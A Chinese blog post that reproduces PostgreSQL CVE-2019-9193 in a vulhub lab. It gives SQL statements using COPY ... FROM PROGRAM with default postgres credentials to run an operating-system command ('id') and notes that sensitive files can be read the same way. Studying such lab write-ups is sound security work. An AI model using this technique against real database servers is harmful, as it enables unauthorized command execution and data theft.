【vulhub】PostGresql高权限命令执行漏洞复现(CVE-2019-9193)

PG数据库2019年爆出的这也是一个权限问题的漏洞,2018爆出的那个是利用远程命令执行,让超级用户去执行备份语句即可触发恶意命令。

而19年这个则是因为PG的9.3后Postgres新增了一个COPY TO/FROM PROGRAM命令,这个命令允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令,也就是说即使不是超级用户也有可能实现任意命令执行。

漏洞复现

这里用超级用户(账号:posgres,密码:postgres)复现,普通用户必须得在pg_read_server_files组中,

#删除一张都会要复现的表,这个表名(cmd_exec)不是固定的也可以用其它的名称
DROP TABLE IF EXISTS cmd_exec;

#创建一张表名,列名(cmd_output)不是固定的随便取
CREATE TABLE cmd_exec(cmd_output text);

#用开始提到的COPY执行命令,cmd_exec是保存命令执行后的内容,id是我们可以执行的命令
COPY cmd_exec FROM PROGRAM 'id';

#查看cmd_exec命令执行后保存的内容  
SELECT * FROM cmd_exec;

 借此我们可以尝试读取一些敏感文件内容

 

参考:

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现 - 腾讯云开发者社区-腾讯云

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值